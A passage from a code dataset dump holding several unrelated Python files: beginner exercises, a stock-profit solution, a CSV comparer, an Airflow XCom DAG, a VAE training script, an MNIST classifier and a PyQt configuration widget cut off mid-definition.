start_time))\r\n","sub_path":"lv_simulator_3stage_optim_fin_v6.py","file_name":"lv_simulator_3stage_optim_fin_v6.py","file_ext":"py","file_size_in_byte":22018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"555049597","text":"'''\n题目:求s=a+aa+aaa+aaaa+aa...a的值,其中a是一个数字。例如2+22+222+2222+22222(此时共有5个数相加),几个数相加由键盘控制。\n'''\n\nif __name__ == '__main__':\n a = int(input(\"input element: \"))\n n = int(input(\"input number: \"))\n\n sum = 0\n val = a \n\n for i in range(n):\n sum += val\n val = val * 10 + a\n\n print(\"sum: %d\" %sum)\n \n","sub_path":"basic_execise/runoob_100_examples/e018_v00.py","file_name":"e018_v00.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"571598580","text":"#!/usr/bin/python\n\nimport argparse\n\n# My solution that I understand\n# def find_max_profit(prices):\n# buy_price = prices[0]\n# sell_price = 0\n# profit = -1000000\n\n# for i in range(len(prices)):\n# each_price = prices[i]\n\n# if each_price < buy_price:\n# buy_price = each_price\n# sell_price = 0\n# elif each_price > sell_price:\n# sell_price = each_price\n# profit = sell_price - buy_price\n# return profit\n\n# Clunky solution to pass the test\ndef find_max_profit(prices):\n profit = -10\n buy_price = 0\n sell_price = 0\n\n change_buy_index = True\n\n for i in range( len(prices) - 1 ):\n sell_price = prices[i+1]\n\n if change_buy_index:\n buy_price = prices[i]\n\n if sell_price < buy_price:\n change_buy_index = True\n continue\n\n else:\n temp_profit = sell_price - buy_price\n if temp_profit > profit:\n profit = temp_profit\n change_buy_index = False\n return profit\n\n\n\nprice1 = [10, 7, 5, 8, 11, 9]\nprice2 = [100, 90, 80, 50, 20, 10]\nprice3 = [1050, 270, 1540, 3800, 2]\nprice4 = [100, 55, 4, 98, 10, 18, 90, 95, 43, 11, 47, 67, 89, 42, 49, 79] \n\nprint(find_max_profit(price1))\nprint(find_max_profit(price2))\nprint(find_max_profit(price3))\nprint(find_max_profit(price4))\n\n\nif __name__ == '__main__':\n # This is just some code to accept inputs from the command line\n parser = argparse.ArgumentParser(description='Find max profit from prices.')\n parser.add_argument('integers', metavar='N', type=int, nargs='+', help='an integer price')\n args = parser.parse_args()\n\n print(\"A profit of ${profit} can be made from the stock prices {prices}.\".format(profit=find_max_profit(args.integers), prices=args.integers))","sub_path":"stock_prices/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"84041616","text":"#!/usr/bin/env python\n\nimport csv\n\ndef csv_list(file):\n with open(file, \"r\", encoding=\"utf-8\") as fp:\n list1 = [i for i in csv.reader(fp)]\n return list1\n\ndef main():\n f = open(\"same.csv\",\"w\",encoding=\"utf-8\",newline=\"\")\n csv_writer = csv.writer(f)\n csv_writer.writerow([\"UUID\"])\n list1 = csv_list(\"2020.csv\")\n list2 = csv_list(\"2019.csv\")\n total = 0\n for i in list1:\n for j in list2:\n if i[0] == j[0]:\n csv_writer.writerow([i[0]])\n total += 1\n print(\"total: \", total)\n\nif __name__ == \"__main__\":\n main()","sub_path":"course/csv-compair.py","file_name":"csv-compair.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"490769700","text":"import random\nimport builtins\nimport time\nimport os\n\nanc_input = builtins.input\néchec = True\n\n\nentrées = [random.randrange(0, 999) for i in range(10)]\n\n\ndef send_msg(channel, msg):\n print(\"TECHIO> message --channel \\\"{}\\\" \\\"{}\\\"\".format(channel, msg))\n\n\ndef success():\n print(\"TECHIO> success true\")\n\n\ndef fail():\n print(\"TECHIO> success false\")\n\n\ndef nouv_input(*params):\n global échec\n\n if len(params) > 1:\n échec = True\n\n elif len(params) > 0:\n print(params[0], end=\"\")\n\n entrée = str(entrées.pop())\n print(entrée)\n\n échec = False\n return entrée\n\n\nbuiltins.input = nouv_input\n\ntry:\n import coffre4\n\n if échec:\n fail()\n send_msg(\"Quelque chose cloche\", \"Avez-vous bien utilisé «input»?\")\n else:\n try:\n int(coffre4.entrée)\n success()\n send_msg(\n \"Bravo!\", \"L'entrée de l'utilisateur (\" + coffre4.entrée + \") est maintenant stockée sous le nom «entrée».\")\n except AttributeError as e:\n fail()\n send_msg(\"Encore un peu!\", \"input() sert à saisir une entrée au clavier. Pour pouvoir l'utiliser plus tard, il faut la stocker sous le nom «entrée» en faisant «entrée = input()».\")\n\nexcept Exception as e:\n fail()\n échec = True\n send_msg(\"Pas tout à fait\",\n 'Quelque chose ne va pas. Utilisez «entrée = input()» après le message de bienvenue.')\n send_msg(\"Erreur\", e)\n","sub_path":"python-project/test_coffre4.py","file_name":"test_coffre4.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"6822093","text":"from datetime import datetime, timedelta\nfrom airflow.models import DAG\nfrom airflow.operators.python_operator import PythonOperator\nimport logging\n\nDAG = DAG(\n dag_id = 'simple_xcom',\n start_date = datetime(2017, 10, 26),\n schedule_interval = None,\n)\n\n\ndef push_function(**context):\n msg = 'the_message'\n logging.info(\"message to push: '%s'\" % msg)\n print(\"message to push: '%s'\" % msg)\n task_instance = context['task_instance']\n task_instance.xcom_push(key = 'the_message', value = msg)\n\n\npush_task = PythonOperator(\n task_id = 'push_task',\n python_callable = push_function,\n provide_context = True,\n dag = DAG,\n)\n\n\ndef pull_function(**kwargs):\n ti = kwargs['ti']\n msg = ti.xcom_pull(task_ids = 'push_task', key = 'the_message')\n logging.info(\"received message: '%s'\" % msg)\n print(\"received message: '%s'\" % msg)\n\n\npull_task = PythonOperator(\n task_id = 'pull_task',\n python_callable = pull_function,\n provide_context = True,\n dag = DAG,\n)\n\npush_task >> pull_task\n","sub_path":"tensorflow/19.airflow-elasticsearch-flask/dags/test_xcom.py","file_name":"test_xcom.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"493878627","text":"# f = \"hello\"\n#\n# print(f[:-1])\n#\n#\n# a = \"TESTBOX PDM, TRAILER, 589567 TESTBOX PDM, TRAILER, 589567 \"\n#\n#\n#\n# if \"TRAILE\" in a:\n# print(\"hppray\")\n# else:\n# print(\"--------bad\")\n#\n#\n# a = ['df']\n#\n# if not a:\n# print(\"hello111\")\n# elif a:\n# print(\"yes\")\n#\n#\n# print(\" xyz d\".rstrip())\n#\n# a = 2\n#\n# if a == 2:\n# print(\"sdd\")\n#\n# print(\"end\")\n#\n#\n# aaa = [1,2,3,4,5]\n#\n# for el in aaa:\n# if el == 2:\n# print(\"sadsad\")\n# print(el)\n#\n#\n# de = ['hello hhh', 'no']\n#\n#\n# if \"no\" in de:\n# print(\"DA\")\n#\n#\n# f = []\n#\n# for el in f:\n# if \"dd\" not in f[0]:\n# print(\"hello1111111\")\n#\n# values = [' ','sda','asdsa',' ']\n#\n#\n# # catch the first non-empty value\n# str_list = [name for name in values if name.strip()]\n#\n# print(str_list[0])\n# print(type(str_list[0]))\n#\n#\n# print(range(5))\n#\n# for el in range(5):\n# print(el)\n#\n#\n# a = \"hello \"\n#\n# v = a.rstrip()\n#\n# print(a.count(\" \"))\n# print(v.count(\" \"))\n#\n# print(a[-3:])\n# print(a)\n# print(a.rstrip())\n#\n# av = ['hello']\n# cd = av[-2:]\n# print(cd)\n#\n# elements = ['first', 'second', 'third']\n#\n# elements_second = ['just']\n#\n# values = []\n#\n# index = 0\n#\n# if elements_second:\n# for el in elements:\n# if index == 0:\n# continue\n# values.append(elements[index])\n# index = index + 1\n#\n# print(values)\n#\n#\n#\n# print(\"12345678\"[:4])\n\n# def square_digits(num):\n# a = str(num)\n# c = \"\"\n# for i in a:\n# b = str(int(i)**2)\n# c = c + b\n#\n# return int(c)\n\n# def get_sum(a,b):\n# if a == b:\n# return a\n# elif a > b:\n# return sum(range(b, a+1))\n# else:\n# return sum(range(a,b+1))\n#\n# print(get_sum(435, 2))\n#\n#\n# def accum(s):\n# index = 0\n# word = \"\"\n# for letter in s:\n# index = index + 1\n# letter = letter * index\n# if index == 1:\n# item = \"\".join(letter.title())\n# else:\n# item = \"-\" + \"\".join(letter.title())\n# word = word + item\n#\n# return word\n#\n# print(accum(\"aaaaz\"))\n#\n# array =[1,1,1,12,11]\n#\n# def find_uniq(arr):\n# # a,b = set(arr)\n# a = list(set(arr))\n# print(a)\n# b = [i for i in a if arr.count(i) == 1]\n# # for i in a:\n# # if arr.count(i) == 1:\n# # b = i\n# # return a if arr.count(a) == 1 else b\n# for i in b:\n# b = f\"{i}\"\n# return b\n#\n# print(find_uniq(array))\n\n\ndef removeDuplicates(nums):\n arr = []\n for i in nums:\n if i not in arr:\n arr.append(i)\n return print(arr)\n\n\nremoveDuplicates([1, 2, 3, 3, 3, 3])\n\ntest_arr = [1, 1, 1, 1, 2, 3, -1, 100]\n\nmin = None\nmax = None\n\nfor i in test_arr:\n if min is None:\n min = i\n elif min < i:\n min = i\n if max is None:\n max = i\n elif max > i:\n max = i\nprint(min, max)\n\n\ndef outer(x):\n obj_lam = lambda y: x + y\n return obj_lam(x)\n\n\nprint(outer(5))\n\nnum = 5\nif num // 2 == 2:\n print(num)\n\n\ndef first_non_repeating_letter(string):\n index = 0\n before_format = string\n string = string.lower()\n if string:\n for l in string:\n after_l = string[index + 1:]\n before_l = string[:index]\n if l not in after_l and l not in before_l:\n return before_format[index]\n index = index + 1\n else:\n return ''\n else:\n return ''\n\n\nprint('++++++++++')\n\nprint(first_non_repeating_letter('sTreSS'))\n\nq = 'helloh'\n\nprint(list(enumerate(q)))\n\n\ndef check_unique(string):\n lower_str = string.lower()\n for i, letter in enumerate(lower_str):\n if q.count(letter) == 1:\n return string[i]\n return ''\n\n\nprint(check_unique('helloh'))\n\n\n\ndup = [1,1,1,1,2,3,3,3,3,4]\n\n\nun = []\nfor i in dup:\n if i not in un:\n un.append(i)\n\n#print(un)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"326847111","text":"import sys\nimport os\nimport time\nimport importlib\nimport argparse\n\nimport numpy as np\n\nimport torch\nimport torch.utils.data\nfrom torch import optim\n\nfrom modules import ResNetEncoderV2, BNResNetEncoderV2, PixelCNNDecoderV2\nfrom modules import VAE\nfrom logger import Logger\nfrom utils import calc_mi\n\nclip_grad = 5.0\ndecay_epoch = 20\nlr_decay = 0.5\nmax_decay = 5\n\n\ndef init_config():\n parser = argparse.ArgumentParser(description='VAE mode collapse study')\n\n # model hyperparameters\n parser.add_argument('--dataset', default='omniglot', type=str, help='dataset to use')\n\n # optimization parameters\n parser.add_argument('--nsamples', type=int, default=1, help='number of samples for training')\n parser.add_argument('--iw_nsamples', type=int, default=500,\n help='number of samples to compute importance weighted estimate')\n # select mode\n parser.add_argument('--eval', action='store_true', default=False, help='compute iw nll')\n parser.add_argument('--load_path', type=str, default='')\n # annealing paramters\n parser.add_argument('--warm_up', type=int, default=10)\n parser.add_argument('--kl_start', type=float, default=1.0)\n\n # these are for slurm purpose to save model\n parser.add_argument('--jobid', type=int, default=0, help='slurm job id')\n parser.add_argument('--taskid', type=int, default=0, help='slurm task id')\n parser.add_argument('--device', type=str, default=\"cpu\")\n parser.add_argument('--delta_rate', type=float, default=1.0,\n help=\" coontrol the minization of the variation of latent variables\")\n parser.add_argument('--gamma', type=float, default=0.5) # BN-VAE\n parser.add_argument(\"--reset_dec\", action=\"store_true\", default=False)\n parser.add_argument(\"--nz_new\", type=int, default=32) # myGaussianLSTMencoder\n parser.add_argument('--p_drop', type=float, default=0.2) # p \\in [0, 1]\n\n args = parser.parse_args()\n if 'cuda' in args.device:\n args.cuda = True\n else:\n args.cuda = False\n\n load_str = \"_load\" if args.load_path != \"\" else \"\"\n save_dir = \"models/%s%s/\" % (args.dataset, load_str)\n\n\n if args.warm_up > 0 and args.kl_start < 1.0:\n cw_str = '_warm%d' % args.warm_up\n else:\n cw_str = ''\n\n hkl_str = 'KL%.2f' % args.kl_start\n drop_str = '_drop%.2f' % args.p_drop if args.p_drop != 0 else ''\n\n seed_set = [783435, 101, 202, 303, 404, 505, 606, 707, 808, 909]\n args.seed = seed_set[args.taskid]\n\n if args.gamma > 0:\n gamma_str = '_gamma%.2f' % (args.gamma)\n else:\n gamma_str = ''\n\n id_ = \"%s_%s%s%s%s_dr%.2f_nz%d%s_%d_%d_%d\" % \\\n (args.dataset, hkl_str,\n cw_str, load_str, gamma_str, args.delta_rate,\n args.nz_new,drop_str,\n args.jobid, args.taskid, args.seed)\n\n save_dir += id_\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n save_path = os.path.join(save_dir, 'model.pt')\n\n args.save_path = save_path\n print(\"save path\", args.save_path)\n\n args.log_path = os.path.join(save_dir, \"log.txt\")\n print(\"log path\", args.log_path)\n\n # load config file into args\n config_file = \"config.config_%s\" % args.dataset\n params = importlib.import_module(config_file).params\n args = argparse.Namespace(**vars(args), **params)\n if args.nz != args.nz_new:\n args.nz = args.nz_new\n print('args.nz', args.nz)\n\n if 'label' in params:\n args.label = params['label']\n else:\n args.label = False\n\n args.kl_weight = 1\n\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if args.cuda:\n torch.cuda.manual_seed(args.seed)\n torch.backends.cudnn.deterministic = True\n return args\n\n\ndef test(model, test_loader, mode, args):\n report_kl_loss = report_kl_t_loss = report_rec_loss = 0\n report_num_examples = 0\n mutual_info = []\n for datum in test_loader:\n batch_data, _ = datum\n batch_data = batch_data.to(args.device)\n\n batch_size = batch_data.size(0)\n\n report_num_examples += batch_size\n\n loss, loss_rc, loss_kl = model.loss(batch_data, 1.0, args, training=False)\n loss_kl_t = model.KL(batch_data, args)\n\n assert (not loss_rc.requires_grad)\n\n loss_rc = loss_rc.sum()\n loss_kl = loss_kl.sum()\n loss_kl_t = loss_kl_t.sum()\n\n report_rec_loss += loss_rc.item()\n report_kl_loss += loss_kl.item()\n report_kl_t_loss += loss_kl_t.item()\n\n mutual_info = calc_mi(model, test_loader, device=args.device)\n\n test_loss = (report_rec_loss + report_kl_loss) / report_num_examples\n\n nll = (report_kl_t_loss + report_rec_loss) / report_num_examples\n kl = report_kl_loss / report_num_examples\n kl_t = report_kl_t_loss / report_num_examples\n\n print('%s --- avg_loss: %.4f, kl: %.4f, mi: %.4f, recon: %.4f, nll: %.4f' % \\\n (mode, test_loss, report_kl_t_loss / report_num_examples, mutual_info,\n report_rec_loss / report_num_examples, nll))\n sys.stdout.flush()\n\n return test_loss, nll, kl_t ##返回真实的kl_t 不是训练中的kl\n\n\ndef calc_au(model, test_loader, delta=0.01):\n \"\"\"compute the number of active units\n \"\"\"\n means = []\n for datum in test_loader:\n batch_data, _ = datum\n\n batch_data = batch_data.to(args.device)\n\n mean, _ = model.encode_stats(batch_data)\n means.append(mean)\n\n means = torch.cat(means, dim=0)\n au_mean = means.mean(0, keepdim=True)\n\n # (batch_size, nz)\n au_var = means - au_mean\n ns = au_var.size(0)\n\n au_var = (au_var ** 2).sum(dim=0) / (ns - 1)\n\n return (au_var >= delta).sum().item(), au_var\n\n\ndef calc_iwnll(model, test_loader, args):\n report_nll_loss = 0\n report_num_examples = 0\n for id_, datum in enumerate(test_loader):\n batch_data, _ = datum\n batch_data = batch_data.to(args.device)\n\n batch_size = batch_data.size(0)\n\n report_num_examples += batch_size\n\n if id_ % (round(len(test_loader) / 10)) == 0:\n print('iw nll computing %d0%%' % (id_ / (round(len(test_loader) / 10))))\n sys.stdout.flush()\n\n loss = model.nll_iw(batch_data, nsamples=args.iw_nsamples)\n\n report_nll_loss += loss.sum().item()\n\n nll = report_nll_loss / report_num_examples\n\n print('iw nll: %.4f' % nll)\n sys.stdout.flush()\n return nll\n\n\ndef main(args):\n if args.cuda:\n print('using cuda')\n print(args)\n\n args.device = torch.device(args.device)\n device = args.device\n\n opt_dict = {\"not_improved\": 0, \"lr\": 0.001, \"best_loss\": 1e4}\n\n all_data = torch.load(args.data_file)\n x_train, x_val, x_test = all_data\n if args.dataset == 'omniglot':\n\n x_train = x_train.to(device)\n x_val = x_val.to(device)\n x_test = x_test.to(device)\n y_size = 1\n y_train = x_train.new_zeros(x_train.size(0), y_size)\n y_val = x_train.new_zeros(x_val.size(0), y_size)\n y_test = x_train.new_zeros(x_test.size(0), y_size)\n\n print(torch.__version__)\n train_data = torch.utils.data.TensorDataset(x_train, y_train)\n val_data = torch.utils.data.TensorDataset(x_val, y_val)\n test_data = torch.utils.data.TensorDataset(x_test, y_test)\n\n\n train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=True)\n val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size, shuffle=True)\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=args.batch_size, shuffle=True)\n print('Train data: %d batches' % len(train_loader))\n print('Val data: %d batches' % len(val_loader))\n print('Test data: %d batches' % len(test_loader))\n sys.stdout.flush()\n\n log_niter = len(train_loader) // 5\n\n if args.gamma > 0:\n encoder = BNResNetEncoderV2(args)\n else:\n encoder = ResNetEncoderV2(args)\n\n decoder = PixelCNNDecoderV2(args)\n\n vae = VAE(encoder, decoder, args).to(device)\n\n if args.eval:\n print('begin evaluation')\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=50, shuffle=True)\n vae.load_state_dict(torch.load(args.load_path))\n vae.eval()\n with torch.no_grad():\n test(vae, test_loader, \"TEST\", args)\n au, au_var = calc_au(vae, test_loader)\n print(\"%d active units\" % au)\n # print(au_var)\n calc_iwnll(vae, test_loader, args)\n return\n\n enc_optimizer = optim.Adam(vae.encoder.parameters(), lr=0.001)\n dec_optimizer = optim.Adam(vae.decoder.parameters(), lr=0.001)\n opt_dict['lr'] = 0.001\n\n iter_ = 0\n best_loss = 1e4\n decay_cnt = 0\n vae.train()\n start = time.time()\n\n kl_weight = args.kl_start\n anneal_rate = (1.0 - args.kl_start) / (args.warm_up * len(train_loader))\n\n for epoch in range(args.epochs):\n\n report_kl_loss = report_rec_loss = 0\n report_num_examples = 0\n for datum in train_loader:\n batch_data, _ = datum\n batch_data = batch_data.to(device)\n if args.dataset != 'fashion-mnist':\n batch_data = torch.bernoulli(batch_data)\n batch_size = batch_data.size(0)\n\n report_num_examples += batch_size\n\n # kl_weight = 1.0\n\n kl_weight = min(1.0, kl_weight + anneal_rate)\n args.kl_weight = kl_weight\n\n enc_optimizer.zero_grad()\n dec_optimizer.zero_grad()\n\n loss, loss_rc, loss_kl = vae.loss(batch_data, kl_weight, args)\n\n loss = loss.mean(dim=-1)\n\n loss.backward()\n torch.nn.utils.clip_grad_norm_(vae.parameters(), clip_grad)\n\n loss_rc = loss_rc.sum()\n loss_kl = loss_kl.sum()\n\n enc_optimizer.step()\n dec_optimizer.step()\n\n report_rec_loss += loss_rc.item()\n report_kl_loss += loss_kl.item()\n\n if iter_ % log_niter == 0:\n\n train_loss = (report_rec_loss + report_kl_loss) / report_num_examples\n if epoch == 0:\n vae.eval()\n with torch.no_grad():\n mi = calc_mi(vae, val_loader, device=device)\n au, _ = calc_au(vae, val_loader)\n\n vae.train()\n\n print('epoch: %d, iter: %d, avg_loss: %.4f, kl: %.4f, mi: %.4f, recon: %.4f,' \\\n 'au %d, time elapsed %.2fs' %\n (epoch, iter_, train_loss, report_kl_loss / report_num_examples, mi,\n report_rec_loss / report_num_examples, au, time.time() - start))\n else:\n print('epoch: %d, iter: %d, avg_loss: %.4f, kl: %.4f, recon: %.4f,' \\\n 'time elapsed %.2fs' %\n (epoch, iter_, train_loss, report_kl_loss / report_num_examples,\n report_rec_loss / report_num_examples, time.time() - start))\n sys.stdout.flush()\n\n report_rec_loss = report_kl_loss = 0\n report_num_examples = 0\n\n iter_ += 1\n\n print('kl weight %.4f' % args.kl_weight)\n print('epoch: %d, VAL' % epoch)\n\n vae.eval()\n\n with torch.no_grad():\n loss, nll, kl = test(vae, val_loader, \"VAL\", args)\n au, au_var = calc_au(vae, val_loader)\n print(\"%d active units\" % au)\n # print(au_var)\n\n if loss < best_loss:\n print('update best loss')\n best_loss = loss\n torch.save(vae.state_dict(), args.save_path)\n\n if loss > best_loss:\n opt_dict[\"not_improved\"] += 1\n if opt_dict[\"not_improved\"] >= decay_epoch:\n opt_dict[\"best_loss\"] = loss\n opt_dict[\"not_improved\"] = 0\n opt_dict[\"lr\"] = opt_dict[\"lr\"] * lr_decay\n vae.load_state_dict(torch.load(args.save_path))\n decay_cnt += 1\n print('new lr: %f' % opt_dict[\"lr\"])\n enc_optimizer = optim.Adam(vae.encoder.parameters(), lr=opt_dict[\"lr\"])\n dec_optimizer = optim.Adam(vae.decoder.parameters(), lr=opt_dict[\"lr\"])\n else:\n opt_dict[\"not_improved\"] = 0\n opt_dict[\"best_loss\"] = loss\n\n if decay_cnt == max_decay:\n break\n\n if epoch % args.test_nepoch == 0:\n with torch.no_grad():\n loss, nll, kl = test(vae, test_loader, \"TEST\", args)\n\n vae.train()\n\n # compute importance weighted estimate of log p(x)\n vae.load_state_dict(torch.load(args.save_path))\n vae.eval()\n with torch.no_grad():\n loss, nll, kl = test(vae, test_loader, \"TEST\", args)\n au, au_var = calc_au(vae, test_loader)\n print(\"%d active units\" % au)\n # print(au_var)\n\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=50, shuffle=True)\n\n with torch.no_grad():\n calc_iwnll(vae, test_loader, args)\n\n\nif __name__ == '__main__':\n args = init_config()\n if not args.eval:\n sys.stdout = Logger(args.log_path)\n main(args)\n","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":13125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"271848000","text":"# Copyright 2015 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"A very simple MNIST classifier.\nSee extensive documentation at\nhttp://tensorflow.org/tutorials/mnist/beginners/index.md\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Import data\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_string('data_dir', '/tmp/data/', 'Directory for storing data')\n\nmnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True)\nprint(\"Type of data \", type(mnist.train.images))\nprint(\"Training input and output shapes \", mnist.train.images.shape, mnist.train.labels.shape)\n\nsess = tf.InteractiveSession()\n\n# Create the model\n# 784 input features are mapped to 10 outputs via weights and bias\n# which are then passed through softmax to map to range [0,1] and sum to 1\nx = tf.placeholder(tf.float32, [None, 784]) # 'None' can be any length\nW = tf.Variable(tf.zeros([784, 10])) # Variable can be used and modified\nb = tf.Variable(tf.zeros([10]))\ny = tf.nn.softmax(tf.matmul(x, W) + b) # model definition\n\n# Define loss and optimizer\ny_ = tf.placeholder(tf.float32, [None, 10]) # outputs\ncross_entropy = -tf.reduce_sum(y_ * tf.log(y))\nsum_square = tf.reduce_sum((y_ - y) * (y_ - y))\n\ntrain_step = tf.train.GradientDescentOptimizer(0.01).minimize(sum_square)\n\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # list of Booleans\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) # define accuracy\n\n\n# Train\ntf.initialize_all_variables().run()\nfor i in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100) # stochastic\n train_step.run({x: batch_xs, y_: batch_ys}) # replace placeholders with batch values\n\n # Test trained model\n if i%100 == 0:\n print(accuracy.eval({x: mnist.test.images, y_: mnist.test.labels})) # calc accuracy on test set\n","sub_path":"tf_mnist1.py","file_name":"tf_mnist1.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"558307358","text":"from param import params\nimport gym_boids\nimport gym\nfrom net.ppo import PPO\nfrom torch.distributions import Categorical\nimport torch\nimport numpy as np\nimport util\nimport sys\nimport plot\n\ndef run_network(infer, x):\n \"\"\" Runs the network to determine action given current state\n\n Parameters:\n infer (dict): dictionary of infering variables\n x (np.array): current state to input into neural network\n\n Returns:\n prob (torch.FloatTensor): output of the network, raw softmax distribution\n m (torch.FloatTensor): categorical distribution of output\n u (torch.FloatTensor): actual action selected by the network\n\n \"\"\"\n\n prob = infer['model'].pi(torch.from_numpy(x).float().to(params['device']))\n m = Categorical(prob)\n u = m.sample().item()\n return prob, m, u\n\ndef transform_state(x, i):\n \"\"\" Transforms the state to make the infering set more varied.\n\n Shifts the position state in a circle so the agents are forced to\n track a point rather than simply move towards a goal point. This\n is a harder problem to learn.\n\n Params:\n x (np.array): current state\n i (int): iteration # within the episode\n\n Returns:\n x_transformed (np.array): augmented/transformed state\n\n \"\"\"\n\n x_transformed = x.copy()\n \n for agent_idx in range(params['n']):\n x_transformed[2 * agent_idx * params['num_dims'] :\n (2 * agent_idx + 1) * params['num_dims'] - 1] -= params['pd'][i, 0]\n\n x_transformed[2 * agent_idx * params['num_dims'] + 1 :\n (2 * agent_idx + 1) * params['num_dims']] -= params['pd'][i, 1]\n\n x_transformed[(2 * agent_idx + 1) * params['num_dims']:\n 2 * (agent_idx + 1) * params['num_dims'] - 1] -= params['vd'][i, 0]\n\n x_transformed[(2 * agent_idx + 1) * params['num_dims'] + 1:\n 2 * (agent_idx + 1) * params['num_dims']] -= params['vd'][i, 1]\n\n return x_transformed\n\ndef infer(path, label):\n \"\"\" Trains an RL model.\n\n First initializes environment, logging, and machine learning model. Then iterates\n through epochs of infering and prints score intermittently.\n \"\"\"\n\n util.set_xd()\n\n infer = {}\n infer['env'] = gym.make(params['env_name'])\n infer['env'].init(params)\n infer['model'] = PPO(params, infer['env'].observation_space.shape[0]).to(params['device'])\n infer['model'].load_state_dict(torch.load(path))\n\n x = transform_state(infer['env'].reset(), 0)\n\n for i in range(1, params['nt']):\n prob, m, u = run_network(infer, x)\n state,_ = infer['env'].step(u)\n x_prime = transform_state(state, i)\n x = x_prime\n\n x = np.array(infer['env'].get_x())\n plot.plot_SS(x, params['T'], title=f\"State Space after {label}\")\n plot.plot_error(x, params['T'], title=f\"Errors after {label}\")\n\nif __name__ == '__main__':\n paths = ['0.24-250.save', '0.65-500.save', '0.82-1000.save', '0.87-2000.save', '0.89-3010.save', '0.89-4020.save','0.90-5020.save', '0.92-5910.save']\n labels = ['250 Episodes', '500 Episodes', '1000 Episodes', '2000 Episodes', '3000 Episodes', '4000 Episodes', '5000 Episodes', '6000 Episodes']\n for i in range(len(paths)):\n infer(f'saves/pweighting/{paths[i]}', labels[i])\n plot.save_figs()\n","sub_path":"infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"465515045","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nModule implementing ASYFLP.\n\"\"\"\n\nfrom PyQt5.QtCore import pyqtSlot, Qt, QPoint #, pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QMenu #, QLineEdit, QComboBox, QTableWidget\nfrom PyDatcomLab.GUIs.PlaneConfiguration import DatcomCARD as DC\n\n\nfrom PyDatcomLab.Core import dcModel \n\nimport logging\n\n\nfrom Ui_ASYFLP import Ui_ASYFLP\n\n\nclass ASYFLP(QWidget, Ui_ASYFLP):\n \"\"\"\n Class documentation goes here.\n \"\"\"\n def __init__(self, parent=None, tModel = None):\n \"\"\"\n Constructor\n \n @param parent reference to the parent widget\n @type QWidget\n \"\"\"\n super(ASYFLP, self).__init__(parent)\n self.setupUi(self)\n #创建日志\n self.logger = logging.getLogger(r'Datcomlogger')\n #开始核心数据的定义\n self.NameList = 'ASYFLP'\n self.VariableList = {\n 'STYPE':{ 'TYPE':'List' ,'Range':['1.0', '2.0', '3.0','4.0', '5.0'], 'Default':'1.0'}, \n 'NDELTA':{ 'TYPE':'INT' ,'Range':[0, 9 ] }, \n 'SPANFI':{ 'TYPE':'REAL' }, \n 'SPANFO':{ 'TYPE':'REAL' },\n 'PHETE':{ 'TYPE':'REAL' }, \n 'CHRDFI':{ 'TYPE':'REAL' }, \n 'CHRDFO':{ 'TYPE':'REAL' }, \n 'XSPRME':{ 'TYPE':'REAL' }, \n 'DELTAL':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'}, \n 'DELTAR':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'}, \n 'DELTAD':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'}, \n 'DELTAS':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'},\n 'XSOC':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'}, \n 'HSOC':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'},\n } \n #self.NMACHLinkTable = []\n self.RuleNumToCount = [{'Num':'NDELTA' , 'Group':'input'}, \n ]\n self.RuleIndexToCombo = [\n {'Index':'STYPE', \n 